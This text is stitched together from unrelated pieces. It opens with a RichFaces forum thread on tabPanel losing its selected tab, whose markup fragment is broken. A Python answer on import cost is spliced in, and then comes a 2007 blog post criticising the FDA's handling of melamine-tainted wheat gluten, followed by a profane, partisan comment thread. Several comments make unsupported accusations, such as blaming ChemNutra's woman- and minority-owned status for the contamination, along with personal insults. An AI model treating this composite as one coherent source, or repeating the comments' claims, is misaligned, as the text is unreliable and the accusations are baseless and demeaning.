1. Re: tabPanel: selected tab is lost

Andrew Wheeler, Mar 26, 2007 7:52 PM (in response to Alan)

I have the same problem. I have tabs with dataTables, which when selected edit the item in a nested conversation. When the nested conversation "pops", the tab context is back at the first tab. I took a slightly different approach using a backing bean. I tried using the valueChangeListener on the tabPanel but that does not give new or old values of the selected tab. Perhaps the RichFaces guys could look at implementing the listener so that the old value is the previous tab and the new value is the newly selected tab.
Anyway, I tried a backing bean which looks like:

@Scope(ScopeType.CONVERSATION)
@Name("richFacesTabSelection")
public class RichFacesTabSelection implements IRichFacesTabSelection, Serializable
{
    private static final long serialVersionUID = 5709694844281585638L;

    private String selectedTab;

    public void tabSelectedActionListener(ActionEvent event)
    {
        this.setSelectedTab(event.getComponent().getId());
    }

    public String getSelectedTab()
    {
        return selectedTab;
    }

    public void setSelectedTab(String selectedTab)
    {
        this.selectedTab = selectedTab;
    }
}

The tab looks like:

<rich:tabPanel
  <rich:tab
  .
  .
</rich:tabPanel>

Ideally I'd like the backing bean to be at page scope, but it does not retain its state when a nested conversation is popped. You'll probably run into trouble with this bean if there is more than one tabPanel in the same conversation. Perhaps the bean could be modified to put the selectedTab in the request values as per Seam's DataModelSelection. It would be nice if this issue were resolved by the standard RichFaces tabPanel.

2. Re: tabPanel: selected tab is lost

M Bol, Mar 27, 2007 8:00 AM (in response to Alan)

I am having the same problem. I thought that tabPanel remembers its selected tab?

3. Re: tabPanel: selected tab is lost

Nick Belaevski, Mar 28, 2007 11:03 AM (in response to Alan)

Hello all! I've checked the tabPanelDemo application today. Both valueChange listeners work fine: one defined as a component attribute, the other defined as a nested tag. You can see them in action in the demo application. The new value obtained from getNewValue() of ValueChangeEvent corresponds to a concrete tab name and can then be set as the "currentTab" property of the tabPanel to open that concrete tab.
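The page-side wiring Andrew describes can be sketched in Facelets. This is a hypothetical reconstruction (the tab ids, the included view names, and the use of switchType, selectedTab, and actionListener are assumptions based on the RichFaces 3.x tabPanel, since the attributes were stripped from the archived post):

```xml
<rich:tabPanel switchType="server"
               selectedTab="#{richFacesTabSelection.selectedTab}">

    <!-- Each tab reports its own id to the backing bean when selected. -->
    <rich:tab id="persons"
              actionListener="#{richFacesTabSelection.tabSelectedActionListener}">
        <ui:include src="persons.xhtml"/>
    </rich:tab>

    <rich:tab id="companies"
              actionListener="#{richFacesTabSelection.tabSelectedActionListener}">
        <ui:include src="companies.xhtml"/>
    </rich:tab>

</rich:tabPanel>
```

Because the bean is conversation-scoped, selectedTab survives postbacks within the conversation, so the panel can reopen the last-selected tab instead of falling back to the first one.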
From a performance point of view (time or memory), is it better to do this:

import pandas as pd
from pandas import DataFrame, TimeSeries

or this:

def foo(bar):
    from numpy import array

This is micro-optimising, and you should not worry about it. Modules are loaded once per Python process. All code that then imports a module only needs to bind a name to the already-loaded module or to objects defined in it. That binding is extremely cheap. Moreover, the top-level code in your module only runs once too, so the binding takes place just once. An import in a function does the binding each time the function is run, but again, this is so cheap as to be negligible.

Importing in a function makes a difference for two reasons: it won't put that name in the global namespace for the module (so no namespace pollution), and because the name is now local, using that name is slightly faster than using a global.

If you want to improve performance, focus on code that is being repeated many, many times. Importing is not it.
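The "loaded once per process" claim is easy to verify: a repeated import of an already-loaded module is just a lookup in sys.modules plus a name binding, and both names end up bound to the same module object. A small sketch (json stands in for pandas/numpy so it runs anywhere):

```python
import sys
import timeit

import json  # first import: the module is executed and cached in sys.modules
cached = sys.modules["json"]

import json  # repeated import: no re-execution, just a cache hit and a rebind
assert sys.modules["json"] is cached

# A repeated import costs roughly as little as a plain attribute lookup.
t_reimport = timeit.timeit("import json", number=100_000)
t_lookup = timeit.timeit("json.dumps", setup="import json", number=100_000)
print(f"100k re-imports: {t_reimport:.4f}s, 100k attribute lookups: {t_lookup:.4f}s")
```

Running this shows both loops finishing in a few hundredths of a second, which is the answer's point: the binding cost is negligible either way.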
First it was only “cuts and gravy” varieties from a single manufacturer, then late last week products from three more facilities were suddenly added to the recall, including one variety of dry cat food. And now the FDA not only admits that the recall could widen further, it has also revealed that the melamine-tainted wheat gluten was indeed delivered to processing plants that make human food as well. Still…

“To date, we have nothing that indicates it’s gone into human food,” said Dorothy Miller, director of the FDA’s Office of Emergency Operations. “We have a bit more investigation to do.”

They certainly do. But.

Wheat gluten is not an obscure feedstock, but rather a common ingredient widely used in a large number of processed foods and baked goods. And while federal regulations distinguish between “food grade” and “feed grade,” the overwhelming majority of wheat gluten distributed in this country is sold as the former.

The FDA always knew the tainted wheat gluten was sold as “food grade,” but never offered this information to the public. And even now they continue to obfuscate the matter. According to import records, the wheat gluten was shipped to the United States from Nov. 3, 2006 to Jan. 23 of this year and contained “minimal labeling” to indicate whether it was intended for humans or animals.

The FDA officials who provided this information either don’t understand our nation’s import regulations, or are intentionally misleading reporters with this “minimal labeling” canard. For as Steve Pickman, VP of Corporate Relations for MGP Ingredients, explains, all “edible” imported wheat gluten is meant for both human and animal consumption:

Regarding imported wheat gluten, U.S. Customs allows for two different gluten classifications to come into the country, “Edible” and “Non-edible.” Non-edible product is not considered destined for the food/pet food markets. Product used in industrial, or non-ingestible, applications would be considered non-edible.
Both food and pet food products are under the jurisdiction of the FDA. These products must adhere to the same standards. Non-edible gluten would be allowed into applications where no food/pet food products are made.

Over 70 percent of the wheat gluten consumed in the U.S. is imported, mostly from Asia, and the remaining 30 percent produced domestically is almost entirely “food grade.” There is no separate channel for “food grade” vs. “feed grade” wheat gluten, so the FDA should have understood that the Chinese imports involved were always graded for human consumption.

Given the nature of the industry and the scope of the recall thus far — over 60 million units from four manufacturers at five separate facilities — and the three-month period over which the suspect wheat gluten was imported, it was perfectly reasonable to assume that at least some of the tainted product would make its way to facilities that process human food, and then onto store shelves and into our kitchens and restaurants.

It has been at least a month since the FDA was first made aware of a potentially widespread food supply contamination, and yet they continue to hold their information close to their vest as they do “a bit more investigation.” Meanwhile, it only took Nestle Purina four hours to discern that it had a contamination problem after the FDA announced on March 30 that the culprit was tainted wheat gluten from a Chinese supplier — information the FDA apparently had since at least March 8.

The American people have the right to know the facts in a timely manner — all the facts — including the identity of the unnamed distributor mentioned in ChemNutra’s press release, the facilities suspected of receiving contaminated wheat gluten, and a complete timeline detailing what was known, and when.
When it comes to issues of public health and safety, the best way to avoid undue speculation and give consumers the information they need to properly protect themselves is to be completely and openly honest. ChemNutra was notified that its wheat gluten was killing animals back on March 8. We need to know why contaminated product was still on the shelves as late as March 30.

But there is a larger issue here: the failure of the FDA to keep up with the challenges of safeguarding a food supply that has become so deeply integrated into the global economy. Perhaps us humans dodged a bullet, and the contamination was indeed limited to pet food. But if it had been the other way around, how would we know? Renal failure can be slow and progressive, the symptoms sometimes not manifesting themselves until months after the initial toxic exposure. Our dead and dying pets may very well have saved thousands of human lives, warning us of the poisoned gluten before it inevitably reached the dinner table.

The FDA failed to protect these dogs and cats, but it just as easily could have been people who paid the price. It is time to rethink the laws governing the FDA, and reevaluate the officers running it. As Mike Brown proved at FEMA, it is best to have government agencies run by people who actually believe in government.

Spencer spews:

From a February 26 item on msnbc.com: Safety tests for U.S.-produced food have dropped nearly 75 percent, from 9,748 in 2003 to 2,455 last year, according to the agency’s own statistics. msnbc.com article

JESUS GOMEZ spews:

Goldy, by God, your best work ever. Congrats, award winning. To protect international business cartels, this administration would lie to the hilt…..must send these people to jail and the unemployment lines…. Incompetent, lying, reckless….stupid….FDA/FEMA….all shitheads installed by Bush Criminal Conspiracy….to the barricades….OUR FREEDOM, OUR DEMOCRACY, OUR LIVES at stake.

Desertthorn spews:

Great report.
Thanks Goldy

David spews:

Years ago, I bought a book titled “American Chamber of Horrors” thinking it was an anthology of American short story writers. It turned out to be much scarier. It was a collection of data and court cases to help people realize that the 1906 Pure Food and Drugs Act needed a little more teeth. From lead, thallium and arsenic in hair removers to the women blinded or killed by cosmetics to the apple orchard workers dying of arsenic poisoning to the tales of what really was in ‘sweet creamery butter’ to the businessmen stating: “Oh, I didn’t know that arsenic/thallium/lead/mercury would be bad for people.” and getting off time and again in court cases just to create a new product with the same ingredients made it an interesting read.

The FDA was created to protect U.S. citizens. By removing their enforcement capabilities and lowering drug testing requirements, all we do is open the door for things like the wheat gluten problem to happen.

Sandro spews:

Thank you, Sir. After that awful AP headline, I’m glad responsible journalists such as yourself are raising important questions and getting to the real issues behind this fiasco.

DeeAnn spews:

Back in 2004, because of one cow in the state of Washington infected with BSE, American companies could no longer export cosmetics to China.

FOR IMMEDIATE RELEASE P04-46 April 21, 2004

Statement on Cosmetic Exports to China

The Food and Drug Administration today announced a successful resolution of an issue arising out of the January, 2004 decision by the Chinese government to suspend on public health grounds the importation of United States cosmetics. The Chinese measure, which was issued after the discovery in the state of Washington of a cow infected with BSE, the so-called Mad Cow Disease, has been estimated by the Department of Commerce to result in the potential loss of $100 million worth of cosmetic exports a year.

This is crazy. Why is our Government in bed with China?
Why can’t we do the same with their dangerous business practices?

DeeAnn spews:

Thought you may want to know the horrid stuff China has been importing into our country. Not everything gets inspected, so this is only what the FDA has caught. It’s disgusting; I had no idea; bet you did not either. Our food, pet food, cosmetics, hair dye, lotions, human medications, pet medications, vitamins, raw materials, juices, fruits, etc. are being severely compromised to the nth degree. Breaded shrimp, blueberries, dates, fish, mushrooms, meat, noodles, garlic, pumpkin seeds, honey, etc. — you name it. It’s all here on the FDA website. Open up the links and prepare to get mad as hell, and get informed. I am not against the people in China, but I am against what is happening here in the U.S.A. What gets inspected coming into this country is a tiny amount — a troubling issue.

Filth from Nov 06
Filth from Sep 06
Filth from Feb 07

Reason: DISEASED
Section: 402(a)(5), 801(a)(3); ADULTERATION
Charge: The food appears to be, in whole or in part, the product of a diseased animal or of an animal which has died otherwise than by slaughter.

Reason: BUTTER
Section: 402(e), 801(a)(3); ADULTERATION
Charge: The article appears to be oleo/margarine or butter with raw materials consisting in whole or in part of a filthy, putrid, or decomposed substance, or the article is otherwise unfit for food.

Reason: CONCEALED
Section: 402(b)(3), 801(a)(3); ADULTERATION
Charge: It appears to be food which has damage or inferiority concealed in any manner.

Reason: CONTAINER
Section: 601(d), 801(a)(3); ADULTERATION
Charge: The container appears to be composed, in whole or in part, of a poisonous or deleterious substance which may render the contents injurious to health.

Reason: COSM COLOR
Section: 601(e), 801(a)(3); ADULTERATION
Charge: The cosmetic appears to not be a hair dye, and is, bears, or contains a color additive which is unsafe within the meaning of section 721(a).

Reason: COSMETIC
Section: 601(c), 801(a)(3); ADULTERATION
Charge: The article appears to be an ingredient in a cosmetic product and may have been prepared, packed or held under insanitary conditions whereby it may have become contaminated with filth or rendered injurious to health.

Reason: DANGEROUS
Section: 502(j), 801(a)(3); MISBRANDING
Charge: The article appears to be dangerous to health when used in the dosage or manner, or with the frequency or duration, prescribed, recommended, or suggested in the labeling thereof.

Reason: DE/RX KIT
Section: 801(d)(1),(2); IMPORTATION RESTRICTED
Charge: The article appears to be a combination medical device/prescription drug kit for which the prescription drug component was manufactured in the U.S., is offered for import by other than the manufacturer, and reimportation

Reason: DIOXIN
Section: 402(a)(1), 402(a)(2)(A), 402(a)(2)(C)(i), 801(a)(3); ADULTERATION
Charge: The article appears to bear or contain dioxins and/or PCB compounds, poisonous or deleterious substances and/or unapproved food additives which may render it injurious to health.

Reason: DR QUALITY
Section: 501(b), 801(a)(3); ADULTERATION
Charge: The article appears to be represented as a drug the name of which is recognized in an official compendium and its strength appears to differ from or its quality or purity appear to fall below the standards set forth in such

Reason: EXCESS SUL
Section: 402(a)(1), 801(a)(3); ADULTERATION
Charge: The article appears to contain excessive sulfites, a poisonous and deleterious substance which may render it injurious to health.

Reason: FALSE
Section: 403(a)(1), 801(a)(3); MISBRANDING
Charge: The labeling appears to be false and misleading in any particular.

Reason: FALSECAT
Section: 403(t), 801(a)(3)
Charge: The article is subject to refusal of admission pursuant to section 801(a)(3) in that it appears to be misbranded because it purports to be or is represented as catfish but is not a fish classified within the family

Reason: FEED & NAD
Section: 501(a)(6), 801(a)(3); ADULTERATION
Charge: The article appears to be an animal feed bearing or containing a new animal drug, and such animal feed is unsafe within the meaning of section 512.

Reason: FILTH
Section: 601(b), 801(a)(3); ADULTERATION
Charge: The cosmetic appears to consist in whole or in part of any filthy, putrid, or decomposed substance.

Reason: FILTHY
Section: 402(a)(3), 801(a)(3); ADULTERATION
Charge: The article appears to consist in whole or in part of a filthy, putrid, or decomposed substance or be otherwise unfit for food.

Reason: WARNINGS
Section: 502(f)(2), 801(a)(3); MISBRANDING
Charge: It appears to lack adequate warning against use in a pathological condition or by children where it may be dangerous to health or against an unsafe dose, method, administering duration, application, in manner/form, to

Kiroking spews:

Ships are loaded with empty containers being shipped BACK to China for refill. Ocean freight is soooo cheap going to China. Anyone wanna guess why? Americans consume more imports than they export. It starts at home. Buy American. Make your own dog food. Grow your own garden. Raise your milk cows, beef cattle, chickens, and pigs. Sew your own clothes…… Shop local, but shop American made. This is always where the door meets the jamb; the imports are cheaper. Give up a little and gain for the good of mankind…..

gretchen spews:

Yikes! I guess I’m glad I’m on the Atkins diet and my pet was buried last year. Thanks for the great analysis.

Enoch Root spews:
The real enemy here is a food economy that is horridly wasteful, and which is basically a setup for a cascading ecological disaster. Read yer Wendell Berry. The industrialization of agriculture is broken, and even an effective FDA can’t fix it. righton spews: goldy, ok w/ your analsysi here. We conservatives want to conserve our own lives… nit though on last line or so….you said “it is best to have government agencies run by people who actually believe in government” –bad point to a decent post…if that notion were true then KCRE or our transport agencies would be well run too. Roger Rabbit spews: What kind of low-life bullies kidnap and beat up women and children? Republicans, that’s who: “By ANTHONY MITCHELL “AP “NAIROBI, Kenya (April 3) – CIA and FBI agents … have been interrogating terrorism suspects …. … Ethiopia … is a country with a long history of human rights abuses. … “U.S. government officials contacted by AP acknowledged questioning prisoners in Ethiopia. But they said American agents were … fully justified in their actions …. The prisoners were never in American custody, said an FBI spokesman, Richard Kolko, who denied the agency would support or be party to illegal arrests. … “But some U.S. allies have expressed consternation at the transfers to the prisons. One Western diplomat in Nairobi … said he sees the United States as playing a guiding role in the operation. “John Sifton, a Human Rights Watch expert on counter-terrorism, … said in an e-mail that the United States has acted as ‘ringleader’ in what he labeled a ‘decentralized,. ‘It was a nightmare from start to finish,’ Kamilya Mohammedi Tuweni, a 42-year-old mother of three … told AP … after her release … on March 24 from … 2 1/2 months in detention without charge. … She was … interviewed, fingerprinted and photographed by a U.S. agent, she said. Tuweni … said she was arrested while on a business trip to Kenya and had never been to Somalia or had any links to that country. …. … “‘We. 
“‘She is exhausted, her face is yellow and she’s lost about 10 kilograms (22 pounds),’ her mother … wrote on a Web site she set up to help secure her daughter’s release. ‘She was beaten with a stick when she demanded to go to the toilet.’ The mother spoke briefly by telephone with AP ….. “The transfer from Kenya to Somalia, and eventually to Ethiopia, of a 24-year-old U.S. citizen, Amir Mohamed Meshal, raised disquiet among FBI officers and the State Department. … U.S. diplomats on Feb. 27 formally protested to Kenyan authorities about Meshal’s transfer and then spent three weeks trying to gain access to him in Ethiopia, said Tom Casey, deputy spokesman for the State Department. … An FBI memo read to AP by a U.S. official in Washington … quoted an agent who interrogated Meshal as saying the agent was ‘disgusted’ by Meshal’s deportation to Somalia by Kenya. The unidentified agent said he was told by U.S. consular staff that the deportation was illegal. “‘My personal opinion was that … the precedent of ‘deporting’ U.S. citizens to dangerous situations when there is no reason to do so was a bad one,’ the official quoted the memo as saying. “Like Benaouda, Meshal was arrested fleeing Somalia. … Meshal’s parents insist he is innocent and called on the U.S. government to win his release. … ‘Clearly. ‘Our. … Kolko, the FBI spokesman, … said … ‘We do not support or participate in any system that illegally detains foreign fighters or terror suspects, including women and children.’ “Paul Gimigliano, a CIA spokesman, declined to discuss details of any such interviews. He said, however: ‘To fight terror, CIA acts boldly and lawfully, alone and with partners, just as the American people expect us to.’ “One of the U.S. officials said the FBI has had access in Ethiopia to several dozen individuals … as part of its investigations. …. … Kenyan government spokesman Alfred Mutua insisted no laws were broken …. 
Lawyers and human rights groups argue the covert transfers to Ethiopia violated international law.

“‘Each of these governments has played a shameful role in mistreating people fleeing a war zone,’ said Georgette Gagnon, deputy Africa director of Human Rights Watch. ‘Kenya has secretly expelled people, the Ethiopians have caused dozens to disappear, and U.S. security agents have routinely interrogated people held incommunicado.’

Quoted under Fair Use; for complete story and/or copyright info, see

Roger Rabbit Commentary: Click here for photo of Republican interrogating terrorism suspects:

Roger Rabbit spews:

McCain Wanted On Kerry’s ’04 Ticket

There are reports today that Sen. John McCain approached Democratic presidential nominee John Kerry about joining the ticket.

Roger Rabbit spews:

Recurring reports of McCain overtures to Democrats about switching parties, together with a poor fund-raising showing, probably doom McCain’s ’08 campaign. And the other GOP front-runner, Rudy Giuliani, is being dogged by his marital indiscretions and business associations with organized crime. This will throw the GOP race wide open and raise the chances of some rightwing nutbag making off with the nomination, setting the stage for the biggest Democratic landslide in history.

Roger Rabbit spews:

Man, I’m going to enjoy this. =:)

Roger Rabbit spews:

I don’t let my veterinarian give me any drugs approved after Jan. 19, 2001.

Roger Rabbit spews:

And these Republican assholes don’t want you to know what hormones and chemicals are in the meat and milk supplies, either.

Roger Rabbit spews:

Give us another 4 years of GOP government and you’ll have Chinese-made wings falling off Boeing jetliners in flight.

Yer Killin Me spews:

Hiring people who hate and mistrust government to run the government is like hiring people who hate and mistrust children to raise your kids.
Jim spews: This latest fiasco is 100% perfectly in line with Smirky McFlightsuit’s approach to ALL public agencies. Fox guarding the hen house is pretty mild to describe the abdication going on. Perhaps I have been watching the reruns of The Sopranos, but these evil people are nothing but RAT BASTARDS. May they all enjoy a nice warm afterlife. Roger Rabbit spews: Fired Prosecutor’s Replacement Lied About His Experience And Was Involved in GOP Voter Suppression Operations … he prosecuted 40 criminal cases while at Ft. Campbell … [b]ut Army authorities say …. ‘Just wanted to clarify, make sure you had an understanding that prosecuted means it’s a case he handled while he was there; it doesn’t mean that it went to trial necessarily,’ Beck said. ‘Prosecuted …. “On NBC’s ‘Meet the Press’ last Sunday, Sen. Orrin Hatch of Utah, a senior Republican on the Senate Judiciary Committee, hailed Griffin as ‘a person with prosecutorial experience who … the U.S. Attorney who was going to be removed said was his right-hand man and one of the best prosecutors he had.’ “… [H]owever, Cummins disputed Hatch’s characterization of the letter. ‘I don’t see … where I referred to him as my “right arm,”‘ Cummins said. ‘I don’t know where they are getting that.’ … Cummins noted that Hatch also made disparaging remarks about Carol Lam, the U.S. Attorney in San Diego who was … fired last year because the White House and Justice Department didn’t rate them highly on … an assessment of whether they were ‘loyal Bushies.’ “‘I imagine Senator Hatch will be very upset with the person or persons that fed him all the wrong information,’ Cummins said …. ‘Sounds like he was provided talking points by someone as reckless with the facts as other previous occurrences in this saga. I have lost count of the public statements they have made that are simply wrong, or … obviously deceptive. 
It smacks of desperation.’ … “In an earlier phone interview, Cummins told me he had no clear recollection of Griffin actually trying any case during his nine-month stint in Little Rock. ‘I honestly don’t remember,’ Cummins said. ‘He may have tried one or two but nothing jumps out at me.’ Cummins added that … ‘other people had to try his cases because he left.’ Griffin quit his job with … Cummins to … work … for the 2004 Bush-Cheney campaign. … “In December 2006, Griffin was named to replace Cummins, a Republican who was well-regarded for his fairness by both Republican and Democratic lawyers in Arkansas. … …. In the final report on the case, Barrett thanked Griffin ‘for helping in the early stages of the investigation.’ “Griffin’s résumé, however, paints a more substantial picture of his role, saying he ‘interviewed. “In September 1999, Griffin joined the Bush-Cheney campaign … handling … opposition research, digging up dirt on political opponents. He also worked as a legal adviser in the Florida recount battle …. “In 2001, Bush appointed Griffin as a special assistant to Michael Chertoff, assistant attorney general at the Justice Department’s criminal division. During five months on the job, Griffin ‘tracked’ issues for Chertoff, such as extradition and provisional arrest, according to Griffin’s résumé. Griffin then spent nine months … as a special assistant to U.S. Attorney Cummins before returning to the political world where he was named research director and deputy communication director for the 2004 Bush-Cheney campaign. “Griffin’s campaign initiatives included the use of a technique known as ‘c ‘caging’ African-Americans who lived in low-income areas or who were in the U.S. military. ‘C ‘advised President George W. Bush and Vice President Richard B. 
Cheney on political matters, organized and coordinated political support for the President’s agenda, including the nomination of Judge John Roberts to be Chief Justice of the Supreme Court.’ “Griffin’s brief White House service was interrupted in September 2005 when he reported for active duty as an attorney at Ft. Campbell, Kentucky. … ‘of Karl Rove playing any role in the decision to appoint Griffin,’ an e-mail by Gonzales’s chief of staff Kyle Sampson revealed that Griffin’s appointment was ‘important to Harriet, Karl, etc.,’ in a reference to then-White House counsel Harriet Miers and Karl Rove. … . “Griffin told the Arkansas Democrat Gazette that ‘I have made the decision not to let my name go forward to the Senate. … I don’t want to be part of that partisan circus.’ “One of the questions Griffin may want to avoid is a detailed recounting of his courtroom experience.” Quoted under Fair Use; for complete story and/or copyright info, see . For the BBC/Palast article on the GOP “caging” operation to disenfranchise soldiers deployed overseas, see . Interfering with a person’s right to vote because of his/her race has been a federal felony since passage of the Voting Rights Act in 1965; I hope one of President Obama’s first official acts is to appoint a special prosecutor to investigate the GOP “caging” operations, and because Griffin was personally involved in these operations, there’s a good chance he could end up in a federal prison. Roger Rabbit spews: @6 “Ships are loaded with empty containers being shipped BACK to china for Refill. Ocean freight is soooo cheap going to china. Anyone wanna guess why? Americans consume more imports than they export. It Starts at home. Buy american.” Well, that’s easy enough — don’t shop at Wal-Mart. Roger Rabbit spews: 95% of what Wal-Mart sells is made in China. If they could import coolie slave labor to work in their stores, they would. 
Roger Rabbit spews:

@9 And you’re saying government works better if it’s run by people who hate government and the citizenry? Or are you saying you’re against ANY government and believe in an every-person-for-himself society … in other words, you’re an anarchist like these guys:

Roger Rabbit spews:

So let me get this straight. China buys wheat from the U.S., the wheat is shipped to China for processing, then is shipped back to the U.S. for use as dog and cat food? And this is a good use for the world’s limited supply of oil? Another market failure.

Roger Rabbit spews:

Why not process U.S. wheat into human and pet food in U.S. factories with American workers? Why do we waste oil to send OUR wheat to China just to avoid paying decent wages to OUR workers?

Roger Rabbit spews:

And CHEAP LABOR CONSERVATIVES want us to let them run our government? It’s bad enough they run our businesses.

DeeAnn spews:

Big business now controls how things are run in this country. As far as Dem vs. Rep, I can’t tell much difference anymore; they each do a lot of harm. Power/greed, it is interchangeable.

Richard Pope spews:

How much does the unnamed Chinese food supplier contribute to the Democrat National Committee?

Richard Pope spews:

ChemNutra must be a Democrat company. From their website: “We are qualified as a woman-owned and minority-owned company.” Sounds like a bunch of liberal Democrats who are in business only because of affirmative action and quotas. How many innocent dogs and cats (and maybe even human beings) are going to die because of this liberal Democrat obsession with affirmative action and quotas?

SeattleJew spews:

Imagine the dollars that go into attempting to have no more than 1/10 space shuttle launches crash. Now imagine the world food supply.

ArtFart spews:

23-24 Hate to be the one to ruffle your fur with this, Roger, but it ain’t just Wal-Mart.
Go into Freddie’s, Penney’s, the Bon–er, I mean Macy’s, Eddie Bauer, Circuit City, Fry’s, Costco…hell, go down to Portland and take a walk through Sak’s, and look at the labels. Everything’s from China, or occasionally Mexico, Pakistan, Bangladesh or Singapore. Roger Rabbit spews: Wal-Mart Spying On Critics “Reuters “NEW YORK (April 4) –. … “Gabbard said in the Journal that he recorded the calls on his own because he felt pressured to stop embarrassing leaks. But he said … most of his spying activities were sanctioned by superiors. “A company spokeswoman, Sarah Clark, characterized its security operations as normal. ‘Like most major corporations, it is our corporate responsibility to have systems in place, including software systems, to monitor threats to our network and our intellectual property so we can protect our sensitive business information,’ she said in the Journal. ‘It is also standard practice to provide physical and information security for our corporate events and for our board of directors and senior executives.'” Quoted under Fair Use; for complete story and/or copyright info see Roger Rabbit Commentary: I guess if you’re big and powerful enough you can pretend you’re a government and create your own police state. You can take it for granted that Wal-Mart, which is notoriously anti-union, doesn’t limit its spying to “security for corporate events and executives” but is also infiltrating and conducting (probably illegal) surveillance of labor organizers as well as community activists who oppose new Wal-Mart store locations. Chadt spews: Mr. Pope, Have you had too much to drink tonight??? Richard Pope spews: And I believe the really massive flood of cheap Chinese imports started during the Clinton administration. Richard Pope spews: No wonder. Hillary Clinton served on the Wal-Mart board of directors. Wonder if cat and dog owners are going to vote for her now? Richard Pope spews: Didn’t Bill Clinton allow China to join the World Trade Organization? 
Roger Rabbit spews: Private Equity Firms Fueling Romney Campaign A financial blog I found on AOL reveals a little-known fact about GOP candidate Mitt Romney’s big fundraising numbers, which surprised the media this week: “The private equity presidency? “Posted Apr 3rd 2007 5:48PM by Tom Taulli “This week, we got the tallies on the fundraising for the upcoming presidential election. As expected, the numbers are big. For example, Hillary Clinton raised a cool $26 million in the first quarter. “But there was one apparent surprise; that is, Republican Mitt Romney raised $21 million. Not bad for someone who doesn’t have much name recognition with the American populace. “Then again, he is well-known in the private equity world. You see, back in 1984, Romney founded Bain Capital Partners, LLC. The firm … currently manages $38 billion. “Yes, it’s fertile ground for a politician to get big-time contributions. What’s more, as private equity firms get bigger, they will realize they need to be more politically savvy. “With his connections, there shouldn’t be any shortage of money for Romney and it’s a good bet we’ll be seeing a lot more of him.” Roger Rabbit Commentary: What are private equity firms? Well, they’re groups of investors you’re not allowed to join who take public companies private so you can’t profit from their stock and they take the cream off the top and then spit out the companies by taking them public again. In other words, they’re Wall Street sharks who get fabulously wealthy by bleeding ordinary investors. Looks like these guys are trying to buy themselves a president. Roger Rabbit spews: For example, Michael Dunmire runs a private equity firm and funds Tim Eyman’s initiative campaigns. Do you want people like Dunmire choosing the next president? Do you want a president who sucks up to people like Dunmire? If so, then Mitt Romney’s your man. Roger Rabbit spews: @38 Didn’t Tricky Dicky Nixon let China into the world in the first place? 
Does Wal-Mart sell goods made by political prisoners? Roger Rabbit spews: @29 My dear, there certainly are problems with how much Democrats suck up to corporations, but as the Bush administration has proved, it does make a difference whether we’re getting screwed by Democrat corporatists or Republican corporatists. Roger Rabbit spews: 30 “How much does the unnamed Chinese food supplier contribute to the Democrat National Committee?” Have you stopped beating your dog yet, Richard? Roger Rabbit spews: @31 Actually, it sounds more like a bunch of rich white Republican guys who are cheating the legitimate women’s and minority businesses of government contracts. This is one of the programs I worked with during my long (30 years) tenure with the state; and I can tell you that putting the company in the wife’s or girlfriend’s name to get preferential treatment in government contracting is an old, old scam. Now, Initiative 200 (or whichever) did away with the contracting preferences for minorities and women, but there are still some benefits from registering as a minority or women-owned business, and the cheaters are still doing it. Trust me on this, Richard. Things aren’t always as they appear in the application forms. My Left Foot spews: I can’t resist. Richard Pope. What a fucking jackass. You are doing a great impression of Monkeyface. Making wild accusations without any evidence. Woman run company, this is your evidence? What, you don’t have women in the Republican party? Well none that will date you, I guess. You know Richard, I smell a class action coming on. Maybe you could get involved and make some real lawyer money? I am glad to see some of our wingnut friends having the backbone to call bullshit on the government on this issue. Shame they won’t do the same with the war. You know, where thousands of America’s young men and women are dying needlessly. Funny how that works. Roger Rabbit spews: A typical women-owned business works like this. 
The rich white Republican guy “sells” his business to his mistress. No money changes hands; only title and IOUs change hands. I saw a case where a part-time waitress making about $10,000 a year “bought” a business for about $3 million by signing her name to a piece of paper. She then “hired” her boyfriend and paid him $8 an hour to run the business. The loan collateral was her kid; I suppose if they had an argument and she got uppity and started acting like she actually owned or ran the business he would tell her to do things his way or he’d kill the little girl, or something like that. That’s how it works in the real world, Richard. Roger Rabbit spews: But the kid got a pony out of it. Richard Pope spews: Roger Rabbit @ 39 So you are saying that Mitt Romney is the Republicans’ answer to George Soros? Roger Rabbit spews: However, if her mommy got too big for her britches, he could repossess the pony any time he wanted because the pony was in his name. In fact, the pony was the ONLY thing in his name! Not only the business, but also the 7,000-square-foot house, the 7 cars, the horse ranch — all were in the waitress’s name. As I recall, he hadn’t been filing tax returns for quite a while. Roger Rabbit spews: @48 No. There’s no comparison whatsoever, Richard. The only thing George Soros wants is honest and competent management of the government. Roger Rabbit spews: @33 Yeah, Art; but is Freddie’s or Costco sending phony-longhairs out to spy on community activists? I don’t see anyone trying to throw Fred Meyer or Costco out of their community. Roger Rabbit spews: Let’s be honest here: Clinton had his fingers in the job-giveaway by signing off on some of these lopsided trade agreements that basically tell American workers to go fuck themselves. He took heat from organized labor for it, and did it anyway. But who was the impetus behind it? That stuff was sent to Clinton’s desk by Republican Congresses. 
And does anyone believe that Bush has made it better, or that anything will improve for American workers or consumers by voting Republican? Roger Rabbit spews: @35 No, but he’s up late because his law practice isn’t exactly prospering and he doesn’t have anything to do in the office tomorrow. Roger Rabbit spews: @37 I hope not. I don’t want Hillary. However, she’s a far, far better choice than ANYONE on the GOP side. Roger Rabbit spews: Did you listen to NBC News last night, Richard? NBC’s Tim Russert intimated that when Obama’s fundraising numbers are announced tomorrow, they’re going to “shock the political world.” Russert seems to have some inside information that as breathtaking as Hillary’s first-quarter numbers are, Obama did even better! Money is important, of course, not only because candidates who can’t raise enough money won’t be able to compete in the primaries, but because it shows how the people who place financial bets on the outcome are placing odds on the various candidates. And this is now shaping up as a 5-person race: Hillary, Obama, and Edwards on the Democratic side; and Romney and Giuliani on the Republican side. McCain appears poised to become the first big name forced out of the race. Roger Rabbit spews: On the Republican side of Lake Washington, the State Patrol ticketed 52 HOV lane cheaters in 2 hours. It must be the sense of entitlement all those arrogant assholes have. righton spews: darcy got another ticket? RightEqualsStupid spews: Always listen to the advice of a guy like Pope. After all, he’s been SOOOOO successful in his career…. Here are some lowlights: 1) Divorced 2) Admonished by the legal profession 3) Rated NOT QUALIFIED by his peers 4) Rejected by voters so many times nobody has an accurate count but it could be as high as 18 times 5) Admitted to mental health issues Yep Dickie, we REALLY care about your opinion. After all, it’s proven to be so valuable in the past. RightEqualsStupid spews: Helluva Job Brownie!
